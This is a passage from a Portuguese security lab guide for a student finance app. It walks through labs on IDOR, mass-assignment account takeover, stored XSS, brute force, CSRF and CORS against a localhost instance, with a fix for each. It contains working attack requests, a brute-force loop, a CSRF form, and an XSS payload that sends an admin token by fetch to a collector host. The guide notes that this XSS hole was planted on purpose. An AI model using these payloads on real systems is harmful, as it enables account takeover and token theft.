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FINANCEIRO26 — MATERIAL DE APOIO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7A1F1F"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
        <w:t xml:space="preserve">Laboratório de Segurança: Ataques e Defesas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Vulnerabilidades reais do projeto financeiro26, reproduzidas em localhost, para ensinar como identificar e corrigir cada uma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Este guia usa falhas que realmente existem no código atual do financeiro26 (não são exemplos fabricados) para demonstrar, na prática, como um sistema real pode ser atacado — e como cada ataque é corrigido. Cada laboratório segue o mesmo roteiro: onde está a falha no código, como reproduzir o ataque passo a passo, o que observar, e a correção recomendada.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Os Laboratórios 1 a 10 exploram endpoints públicos (/usuario, /perfil, /autenticacao). Os Laboratórios 11 a 17 vão além: mostram que "exigir login" não é a mesma coisa que "estar seguro" — usando a área restrita de Lançamentos (/lancamento) e o fluxo de recuperação de senha, cobrindo autorização quebrada entre usuários (IDOR, mass assignment), escalonamento até virar administrador, injeção de SQL, um fluxo de recuperação de senha malfeito e um path traversal capaz de ler os próprios segredos do backend.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
          <w:bottom w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
          <w:left w:val="single" w:color="C94F4F" w:sz="18" w:space="8"/>
          <w:right w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="FBE1E1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8C1C1C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Atenção — leia antes de aplicar em aula:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="6B1414"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">todo este material deve ser executado apenas contra a sua própria instância local (localhost) do financeiro26, com dados de teste — nunca contra um ambiente de produção, dados reais de alunos, ou qualquer sistema que não seja seu. Reproduzir estas técnicas contra sistemas de terceiros sem autorização é crime (Lei 12.737/2012 e Lei 14.155/2021, no Brasil). O objetivo é 100% defensivo: entender o ataque para saber se proteger dele.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="BFBFBF" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="260" w:before="1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A83A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Conteúdo deste material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Regras do laboratório e ferramentas necessárias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Preparando o ambiente de testes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1 — O payload do JWT não é criptografado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2 — Exposição de dados sem autenticação (IDOR)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3 — Sequestro de conta via mass assignment (CRÍTICO)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4 — Token de acesso continua válido após logout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5 — Roubo de token via XSS no localStorage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6 — Força bruta e abuso de cadastro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7 — Ausência de política de senha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8 — E-mail duplicado derruba o login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9 — CSRF nos endpoints de cookie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10 — CORS mal configurado (contraste defensivo)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11 — Regra de negócio validada só no frontend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12 — IDOR na área logada: acessando dados de outro usuário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13 — Mass assignment: lançamento na conta de outra pessoa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14 — Injeção de SQL na busca de lançamentos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15 — Escalonamento de privilégio: virando ADMIN sozinho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16 — Recuperação de senha insegura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Laboratório 17 — Path traversal no upload/download de comprovantes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Resumo: prioridade de correção e mapeamento para o OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/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Regras do laboratório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Use apenas o ambiente local (localhost) do financeiro26 — backend em http://localhost:8081, frontend em http://localhost:3000.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Crie usuários de teste com dados fictícios (ex.: teste1@exemplo.com). Nunca use e-mail ou senha reais.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Nunca cole tokens reais (mesmo de teste) em ferramentas online de terceiros (como jwt.io) — decodifique localmente, como mostrado no Laboratório 1.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Depois de demonstrar cada ataque, aplique a correção sugerida antes de seguir para o próximo — isso reforça que toda falha tem um jeito conhecido de resolver.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Ao final da aula, apague os usuários de teste, os refresh tokens criados durante os laboratórios, os arquivos em backend/uploads/ e o tokens_capturados.txt gerado pelo coletor do Laboratório 5.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Ferramentas necessárias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8C2A2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Ferramenta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6400"/>
            <w:shd w:fill="8C2A2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 que serve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curl (ou Postman/Insomnia)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Fazer requisições HTTP diretas à API, sem passar pelo frontend — essencial para ver a API "nua", sem as proteções visuais do React.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DevTools do navegador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Aba Application/Storage para inspecionar localStorage e cookies; aba Console para simular scripts injetados; aba Network para ver cabeçalhos e cookies trafegando.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python -m http.server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Sobe um servidor estático simples em segundos — usado para simular uma "página de atacante" em outra origem/site, nos laboratórios de CSRF e CORS.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MySQL Workbench / DBeaver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Olhar diretamente as tabelas usuario, refresh_token, etc., para confirmar o efeito real de cada ataque no banco.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docs/laboratorio-seguranca/coletor_xss.py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Script incluído no projeto — representa o servidor do atacante no Laboratório 5, capturando e registrando qualquer token exfiltrado por um payload de XSS.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Por que não usar jwt.io para decodificar tokens?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jwt.io é confiável e não envia o token para nenhum servidor (decodifica no próprio navegador), mas é um hábito perigoso de se criar: em outra ferramenta menos confiável, colar um token ali poderia vazá-lo de verdade. O Laboratório 1 mostra como decodificar localmente, sem depender de nenhum site.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Preparando o ambiente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Suba o backend (mvnw spring-boot:run) e o frontend (npm start).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Cadastre dois usuários de teste pelo frontend (/novo-cadastro): por exemplo "Usuario Teste Um" e "Usuario Teste Dois", com e-mails e senhas diferentes.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Anote os IDs desses usuários (GET /usuario mostra a lista, incluindo os IDs — o que já é, por si só, o Laboratório 2).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Para os Laboratórios 11 a 13, faça login de cada um via POST /autenticacao/login e guarde os dois access tokens retornados — eles serão chamados de TOKEN_A (dono da conta "Usuario Teste Um") e TOKEN_B ("Usuario Teste Dois") nos comandos a seguir.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1 — O payload do JWT não é criptografado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A02 — Cryptographic Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="5A6B7A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INFORMATIVA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Este primeiro laboratório não explora uma falha do financeiro26 especificamente — é uma característica de todo JWT que muitos alunos (e desenvolvedores) entendem errado: o token parece "embaralhado", mas não está criptografado. Qualquer pessoa com o token consegue ler o conteúdo, mesmo sem a chave secreta.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Faça login pelo frontend e copie o token (DevTools &gt; Application &gt; Local Storage &gt; chave "usuario" &gt; campo token).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 terminal, separe o token em suas 3 partes (cabeçalho.payload.assinatura) e decodifique a segunda parte (o payload) com uma ferramenta padrão do sistema — sem depender de nenhum site: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bash/git bash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TOKEN="cole_o_token_aqui"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$TOKEN | cut -d "." -f2 | base64 -d 2&gt;/dev/null | python -m json.tool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PowerShell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$payload = ($env:TOKEN -split "\.")[1]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$payload = $payload.Replace("-","+").Replace("_","/")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[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload.PadRight(($payload.Length + 3) -band -bnot 3, "=")))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Observe que o e-mail do usuário (claim "sub"), a data de emissão ("iat") e a de expiração ("exp") aparecem em texto legível — sem precisar de senha, chave ou qualquer segredo.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que isso significa na prática: nunca coloque dados sensíveis (senha, CPF, saldo, cartão) dentro do payload de um JWT — qualquer um que intercepte o token (rede não criptografada, log mal configurado, extensão de navegador maliciosa) lê tudo imediatamente. A segurança do JWT está inteiramente na assinatura (impedir alteração), não no sigilo do conteúdo.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Nesse caso não há "correção de código"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a defesa aqui é de projeto: manter o payload enxuto (só o identificador do usuário, como já fazemos) e sempre trafegar tokens sobre HTTPS em produção, para que ao menos a interceptação de rede exija comprometer o TLS.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2 — Exposição de dados sem autenticação (IDOR)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A01 — Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="C0392B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ALTA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Em UsuarioController.java, os endpoints de listagem estão liberados para qualquer um em ConfiguracaoSeguranca.java (.requestMatchers("/usuario/**").permitAll()). Isso significa que GET /usuario e GET /usuario/{id} respondem sem exigir nenhum token.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Sem fazer login, sem token nenhum, rode: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http://localhost:8081/usuario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Observe que a resposta traz nome, e-mail e id de TODOS os usuários cadastrados no sistema — a senha não aparece (graças ao @JsonProperty(WRITE_ONLY) da seção 4 do material de JWT), mas o resto dos dados pessoais está exposto.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Repita para um ID específico: curl http://localhost:8081/usuario/1 — mesmo resultado, sem exigir token.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Por que isso é considerado "IDOR" (Insecure Direct Object Reference)?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porque o sistema usa um identificador previsível e sequencial (1, 2, 3...) para expor recursos, sem checar se quem está pedindo tem permissão para ver aquele recurso. Em vez de "ninguém pode ver", o sistema deveria decidir "só o dono ou um admin pode ver".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em ConfiguracaoSeguranca.java, restringir /usuario/** a anyRequest().authenticated() (deixando só POST /usuario público, para permitir cadastro) e, no UsuarioController, usar o AuthUsuarioProvider para permitir que cada usuário só veja seus próprios dados — a menos que tenha o perfil ADMIN (usando @PreAuthorize). Este ajuste já está listado como exercício 1 no material de JWT.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3 — Sequestro de conta via mass assignment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A01 — Broken Access Control / A08 — Software and Data Integrity Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="8C1C1C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CRÍTICA  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
          <w:bottom w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
          <w:left w:val="single" w:color="C94F4F" w:sz="18" w:space="8"/>
          <w:right w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="FBE1E1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8C1C1C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Este é o laboratório mais sério do material:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="6B1414"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ele demonstra como um atacante pode assumir o controle de QUALQUER conta existente, sem saber a senha, apenas conhecendo (ou adivinhando) o ID numérico do usuário-alvo.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POST /usuario recebe o corpo da requisição diretamente como a entidade Usuario (UsuarioController.java, método inserir). Como o campo id não tem nenhuma proteção contra ser preenchido pelo cliente, um atacante pode simplesmente incluir o id de um usuário que já existe.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Por trás dos panos: UsuarioRepository.save(usuario) decide entre criar um registro novo ou atualizar um existente observando se o id chegou nulo ou preenchido (é assim que o Spring Data JPA trata entidades com @GeneratedValue(IDENTITY)). Se o id vier preenchido e já existir no banco, o Spring Data interpreta como "atualizar", não "criar" — e substitui nome, e-mail e senha do registro existente pelos valores enviados pelo atacante.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Cadastre normalmente a "vítima": nome "Vitima Original Nome", e-mail vitima@exemplo.com, senha "SenhaDaVitima123". Confirme o ID dela com GET /usuario (Laboratório 2).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Sem estar autenticado como a vítima, envie (supondo que o ID dela seja 1):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http://localhost:8081/usuario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'{"id":1,"nome":"Conta Sequestrada Pelo Atacante","email":"atacante@evil.com","senha":"SenhaDoAtacante"}'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Tente fazer login com vitima@exemplo.com e SenhaDaVitima123 — não funciona mais. Agora faça login com atacante@evil.com e SenhaDoAtacante — funciona, e é a MESMA conta (mesmo id), agora sob controle do atacante.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Peça aos alunos para confirmar no banco (tabela usuario) que a linha original teve nome/email/senha sobrescritos, mantendo o mesmo id — e que, por causa do cascade em UsuarioPerfil, o comportamento sobre os perfis vinculados também merece ser investigado e documentado por eles (o efeito exato pode variar; é um ótimo exercício de observação empírica).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nunca usar a entidade JPA diretamente como corpo de um POST de criação. Criar um UsuarioCadastroDTO (só nome, email, senha) e, no serviço, sempre instanciar um Usuario novo (new Usuario()) a partir do DTO — nunca repassar um objeto que possa carregar um id vindo do cliente. Esse é exatamente o mesmo princípio já aplicado ao login (UsuarioRequisicaoDTO em vez da entidade Usuario) — vale reaproveitar a ideia aqui.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4 — Token de acesso continua válido após logout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A07 — Identification and Authentication Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="D68910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MÉDIA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AutenticacaoService.logout() (seção 11.4 do material de JWT) revoga apenas o refresh token no banco. O access token (JWT) já emitido continua criptograficamente válido até sua expiração natural (jwt.expiration) — o backend não tem como "cancelar" um JWT antes da hora, porque a validação dele é stateless (JwtFiltroAutenticacao nunca consulta o banco para isso).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Faça login e copie o access token (localStorage, campo token).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Chame uma rota protegida qualquer com esse token e confirme que funciona.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Faça logout pelo frontend (ou POST /autenticacao/logout).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Reenvie exatamente a mesma chamada do passo 2, com o MESMO token (Authorization: Bearer &lt;token&gt;) — ela continua funcionando normalmente, mesmo após o logout.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Isso é um "bug"?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é uma limitação conhecida e aceita de qualquer arquitetura JWT stateless — o ganho de não consultar o banco a cada requisição tem esse custo. A mitigação de mercado é manter o access token bem curto (aqui, ~16 minutos) para limitar a janela de risco, exatamente como este projeto já faz.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Se for necessário revogar imediatamente (cenários sensíveis)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existem duas abordagens: (1) reduzir ainda mais jwt.expiration; (2) manter uma "denylist" de tokens revogados (ex.: em memória ou Redis, pela claim jti do token) que o JwtFiltroAutenticacao consulta antes de aceitar qualquer token — o que reintroduz um pouco de estado, trocando parte do ganho de performance por revogação imediata.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5 — Roubo de token via XSS no localStorage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A03 — Injection (XSS) / A05 — Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="8C1C1C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CRÍTICA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React escapa texto por padrão — {variavel} nunca vira HTML. Por isso, para este laboratório ser real (não simulado), foi adicionado DE PROPÓSITO o único ponto do app que reintroduz uma injeção de verdade: a tela administrativa AdminLancamentos.jsx (/admin/lancamentos), que renderiza a descrição de cada lançamento com dangerouslySetInnerHTML em vez do {descricao} seguro usado em todo o resto do projeto.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AdminLancamentos.jsx — o ÚNICO lugar do app que faz isso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colunaDescricao = (linha) =&gt; (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&lt;span dangerouslySetInnerHTML={{ __html: linha.descricao }} /&gt;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);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5.1 Conceito rápido (simulado no Console)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Antes do ataque completo, vale confirmar rapidamente por que o access token é um alvo e o refresh token não é — sem precisar de nenhuma injeção de verdade ainda:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Faça login normalmente e abra o Console do DevTools na aba do próprio financeiro26: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JSON.parse(localStorage.getItem("usuario")).token   // aparece inteiro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document.cookie                                     // refreshToken NÃO aparece aqui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Confirmado o contraste, o restante deste laboratório mostra a exfiltração de verdade — sem digitar nada no Console da vítima.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5.2 O ataque completo, de ponta a ponta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Vamos usar exatamente o roteiro descrito para a turma: o atacante planta o payload no PRÓPRIO lançamento (não precisa de acesso a mais nada), e espera até que a vítima (o ADMIN) abra a tela que lista todos os lançamentos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Em outro terminal (fora do projeto), rode o coletor incluído em docs/laboratorio-seguranca/coletor_xss.py — ele representa o servidor do atacante, esperando o token chegar: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docs/laboratorio-seguranca/coletor_xss.py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[coletor] escutando em http://0.0.0.0:9999 — aguardando tokens...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Logado como um usuário comum (o "atacante"), crie um lançamento cuja descrição seja o payload abaixo — troque SEU_IP pelo IP da máquina onde o coletor está rodando (localhost, se for a mesma máquina):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&lt;img src=x onerror="fetch('http://SEU_IP:9999/roubar?t='+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JSON.parse(localStorage.getItem('usuario')).token)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Torne-se ADMIN (Laboratório 15) ou peça para outra pessoa da turma, já ADMIN, seguir o próximo passo — a vítima real deste ataque é sempre quem tem MAIS privilégio, não o próprio atacante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Como ADMIN, abra /admin/lancamentos (menu "Todos os Lançamentos (Admin)"). Assim que a lista renderiza, o navegador tenta carregar a "imagem" x, falha, e o atacante onerror dispara sozinho — nenhum clique é necessário.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Olhe o terminal do coletor: o access token do ADMIN aparece capturado, junto do IP de quem o enviou (o navegador da vítima, não o do atacante) — e fica salvo em tokens_capturados.txt.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============================================================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[2026-09-11 10:42:07] token roubado de 127.0.0.1: eyJhbGciOiJIUzI1NiJ9...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============================================================</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Use esse token roubado para chamar uma rota de ADMIN você mesmo (o "atacante", sem nunca ter feito login como administrador):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http://localhost:8081/lancamento/todos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TOKEN_ROUBADO_DO_COLETOR"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
          <w:bottom w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
          <w:left w:val="single" w:color="C94F4F" w:sz="18" w:space="8"/>
          <w:right w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="FBE1E1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8C1C1C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">O que aconteceu de fato, sem nenhuma etapa simulada:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="6B1414"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">o atacante nunca acessou o navegador nem a máquina do ADMIN. O payload ficou guardado no banco (é um "lançamento" comum), esperando pacientemente até que a própria vítima abrisse uma tela legítima do sistema. A partir daí, o navegador DELA executou o script e enviou o token para um servidor que ELE nunca visitou — a exfiltração aconteceu de dentro para fora, pela própria rede da vítima.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Por que a lista de "Todos os Lançamentos" e não a lista comum?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porque XSS armazenado é mais perigoso quanto MAIOR o privilégio de quem visualiza o conteúdo malicioso — um atacante raramente quer roubar o próprio token. Ao mirar a tela que só o ADMIN abre, o Laboratório 5 se conecta ao Laboratório 15: a mesma escalação de privilégio que deixa alguém virar ADMIN também aumenta o valor de qualquer XSS que atinja essa pessoa depois.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a causa raiz é uma única linha: trocar dangerouslySetInnerHTML={{ __html: linha.descricao }} por {linha.descricao} — o React volta a escapar o conteúdo automaticamente, e o payload aparece como texto literal (&lt;img src=x...&gt;), inofensivo. Como camada extra de defesa (útil mesmo que uma outra tela cometa o mesmo erro no futuro), adicionar um Content-Security-Policy restringindo de onde scripts/conexões podem ser carregados, e nunca usar dangerouslySetInnerHTML com qualquer dado que não seja gerado e controlado pelo próprio backend.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6 — Força bruta e abuso de cadastro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A07 — Identification and Authentication Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="D68910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MÉDIA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Nem POST /autenticacao/login nem POST /usuario têm qualquer limite de tentativas, bloqueio temporário ou captcha. Isso abre dois problemas distintos, mostrados a seguir.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6a) Força bruta de senha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Com um usuário de teste já cadastrado, rode um laço simples tentando várias senhas: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for senha in 123456 senha123 SenhaDaVitima123 admin; do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echo "Tentando: $senha"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curl -s -X POST http://localhost:8081/autenticacao/login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-H "Content-Type: application/json"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-d "{\"email\":\"vitima@exemplo.com\",\"senha\":\"$senha\"}"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echo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done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Nenhuma tentativa é bloqueada, atrasada ou registrada de forma especial — o backend responde na mesma velocidade indefinidamente, o que viabiliza testar milhares de senhas por minuto com uma lista maior (um "dicionário").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6b) Abuso do cadastro (spam de e-mail)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UsuarioService.inserir() dispara um e-mail de boas-vindas a cada cadastro bem-sucedido (EnvioEmailService). Como POST /usuario também não tem limite de chamadas, um script que cadastra usuários em massa, usando e-mails de terceiros reais no campo email, faria o financeiro26 enviar e-mails não solicitados para essas caixas — usando a conta de e-mail configurada em spring.mail.username.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
          <w:bottom w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
          <w:left w:val="single" w:color="C94F4F" w:sz="18" w:space="8"/>
          <w:right w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="FBE1E1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8C1C1C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Cuidado ao demonstrar o item 6b em aula:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="6B1414"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">só use endereços de e-mail fictícios ou controlados por você (ex.: contas de teste próprias). Nunca use e-mails reais de terceiros, mesmo que só para "provar o ponto" — isso seria enviar spam de verdade a partir da conta configurada no projeto.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adicionar um limite de tentativas (ex.: biblioteca Bucket4j, ou um contador simples por IP/e-mail com bloqueio temporário) em ambos os endpoints, e considerar um captcha no cadastro público. Frameworks como Spring Security também permitem lockout de conta após N tentativas falhas seguidas.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7 — Ausência de política de senha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A07 — Identification and Authentication Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="7D8C3C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BAIXA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campo senha em Usuario.java não tem nenhuma anotação de validação (diferente de nome, que exige @NotBlank e @Size(min = 10)). Isso significa que o Bean Validation (@Valid no controller) não barra uma senha vazia ou de um único caractere.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http://localhost:8081/usuario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'{"nome":"Usuario Senha Fraca","email":"fraco@exemplo.com","senha":""}'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cadastro é aceito normalmente (201 Created) — o BCryptPasswordEncoder gera um hash até para uma senha vazia, então tecnicamente "funciona", mas protege muito pouco.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adicionar @NotBlank e @Size(min = 8) (ou mais) no campo senha, e opcionalmente uma anotação de validação customizada exigindo letras e números. Vale reforçar aos alunos que validação de formato (tamanho mínimo) é diferente de política de senha completa (histórico, força, etc.), mas já é um bom primeiro passo.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8 — E-mail duplicado derruba o login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A04 — Insecure Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="D68910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MÉDIA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Não existe nenhuma restrição de unicidade no campo email — nem no banco (sem @Column(unique = true)), nem checada em UsuarioService.inserir() antes de salvar. UsuarioRepository.findByEmail(email) devolve Optional&lt;Usuario&gt;, que espera NO MÁXIMO um resultado.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1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Cadastre dois usuários diferentes com o MESMO e-mail (nomes e senhas diferentes): duplicado@exemplo.com.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Tente fazer login com duplicado@exemplo.com e qualquer uma das duas senhas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Observe o erro: o backend lança uma exceção de "mais de um resultado" (IncorrectResultSizeDataAccessException) ao tentar buscar por e-mail, e o login falha com erro 500/interno — mesmo com a senha correta.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Este não é exatamente um "ataque" (não dá vantagem a um invasor), mas é uma negação de serviço acidental: basta duas pessoas se cadastrarem (por engano ou de propósito) com o mesmo e-mail para que NENHUMA das duas consiga mais logar, até que um administrador limpe o banco manualmente.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adicionar @Column(unique = true) no campo email da entidade Usuario, e validar explicitamente em UsuarioService.inserir() (antes de salvar) se já existe um usuário com aquele e-mail, retornando um erro de negócio claro em vez de deixar o banco (ou uma exceção genérica) barrar depois. Este ajuste já está listado como exercício no material de JWT.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9 — CSRF nos endpoints de cookie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A01 — Broken Access Control (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="5A6B7A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INFORMATIVA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Diferente dos laboratórios anteriores, este mostra uma defesa que JÁ FUNCIONA — é importante que os alunos vejam não só ataques bem-sucedidos, mas também vejam um ataque falhar e entendam por quê.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1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Faça login pelo frontend normalmente (o cookie refreshToken fica salvo no navegador).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Crie um arquivo ataque.html em uma pasta separada, fora do projeto, com este conteúdo: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&lt;!-- ataque.html --&gt;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&lt;body onload="document.forms[0].submit()"&gt;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&lt;form action="http://localhost:8081/autenticacao/logout" method="POST"&gt;&lt;/form&gt;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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Sirva esse arquivo em outra origem — por exemplo, com python -m http.server 5500 dentro da pasta onde está o ataque.html.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Abra http://127.0.0.1:5500/ataque.html no MESMO navegador em que você está logado no financeiro26 (em outra aba).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Verifique no financeiro26: você continua logado. O formulário disparou a requisição, mas o navegador NÃO anexou o cookie refreshToken a ela, porque sameSite("Lax") bloqueia esse cookie em requisições cross-site iniciadas por outro site.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Por que 127.0.0.1:5500 e não localhost:3000?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para o navegador, localhost:3000 e localhost:8081 contam como o MESMO "site" (mesmo domínio, portas diferentes) — então usar outra porta de localhost não provaria nada sobre proteção cross-site. 127.0.0.1 e localhost são tratados como sites diferentes, por isso simulam de verdade uma página de atacante externa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
          <w:bottom w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
          <w:left w:val="single" w:color="C94F4F" w:sz="18" w:space="8"/>
          <w:right w:val="single" w:color="C94F4F" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="FBE1E1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8C1C1C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Para ver o ataque funcionando (fins didáticos)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="6B1414"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">troque temporariamente .sameSite("Lax") por .sameSite("None") em AutenticacaoController.java (lembrando que sameSite("None") exige secure(true) e, portanto, HTTPS — em http puro o navegador vai descartar o cookie de qualquer forma). Repita o teste e mostre a diferença: sem Lax, o formulário forjado consegue deslogar a vítima. Desfaça a alteração depois — nunca deixe sameSite("None") em um ambiente sem HTTPS.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10 — CORS mal configurado (contraste defensivo)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A05 — Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="5A6B7A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INFORMATIVA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Assim como o Laboratório 9, este mostra uma configuração correta e o que aconteceria se ela fosse enfraquecida. ConfiguracaoSeguranca.java já restringe setAllowedOrigins a http://localhost:3000 — vamos ver o que isso evita.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13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Reaproveite o servidor de arquivos do Laboratório 9 (python -m http.server 5500) e crie um arquivo coletar.html com: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&lt;script&gt;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fetch("http://localhost:8081/usuario")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.then(r =&gt; r.json())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.then(dados =&gt; document.write(JSON.stringify(dados)))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.catch(e =&gt; document.write("Bloqueado pelo CORS: " + e));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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Abra http://127.0.0.1:5500/coletar.html — observe no Console/tela que o navegador bloqueia a leitura da resposta, mesmo o endpoint sendo público (Laboratório 2), porque a origem 127.0.0.1:5500 não está na lista allowedOrigins.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ponto-chave para os alunos: CORS não protege a API contra chamadas diretas (curl, Postman, outro backend) — o Laboratório 2 continua funcionando de qualquer lugar. CORS protege especificamente contra JavaScript de OUTROS SITES lendo a resposta dentro do navegador da vítima. São camadas diferentes, resolvendo problemas diferentes.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E se allowedOrigins fosse "*"?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para um endpoint como /usuario, que já não exige autenticação (Laboratório 2), qualquer site na internet poderia embutir esse fetch em uma página comum e coletar silenciosamente a lista de usuários de quem visitasse essa página — transformando uma falha "que exige o atacante saber a URL" em uma "que se espalha sozinha para quem visita qualquer site malicioso". Nunca use "*" em uma API que tem qualquer endpoint sensível, mesmo que pareça conveniente em desenvolvimento.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11 — Regra de negócio validada só no frontend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A04 — Insecure Design</w:t>
      </w:r>
    </w:p>
    <w:p>
